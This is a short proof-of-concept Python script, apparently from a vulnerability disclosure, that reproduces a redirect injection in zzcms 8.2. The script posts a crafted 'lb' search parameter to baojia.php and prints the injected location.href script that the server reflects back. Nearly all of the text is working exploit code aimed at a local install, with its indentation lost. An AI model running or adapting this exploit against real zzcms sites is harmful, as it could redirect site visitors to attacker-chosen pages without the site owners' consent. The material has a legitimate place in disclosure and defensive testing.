If you want to reproduce the vulnerability, you need to deploy the related environment .project download address locally:
http://www.zzcms.net/zx/show-167.htm
import requests
import os
import re
#Please enter the path you want to jump from the current directory.
#For example: if you want to jump to the root directory from http://localhost/zzcms8.2, then you can type in ../
print('Please enter the path you want to jump from the current directory.\nFor example: if you want to jump to the root directory from http://localhost/zzcms8.2, then you can type in ../')
print('input:',end="")
dir_input=input()
def poc():
payload={'action':'search','lb':dir_input+'?'}
#This is my local environment
r=requests.post('http://localhost/zzcms8.2/baojia/baojia.php',data=payload)
if(r.content):
print(r.content)
reg='.*?(<script>location.href=.*keyword=.*</script>)'
response=r.content.decode('utf-8')
result=re.match(reg,response)
print('\nNow the browser executes the following javascript script when loading the page:')
print(result.group(1))
print('The first question mark is truncated, so the browser will jump to the http://localhost/zzcms8.2/baojia/baojia.php'+dir_input)
else:
print('unknown mistake')
os.system("pause")
poc()
网友评论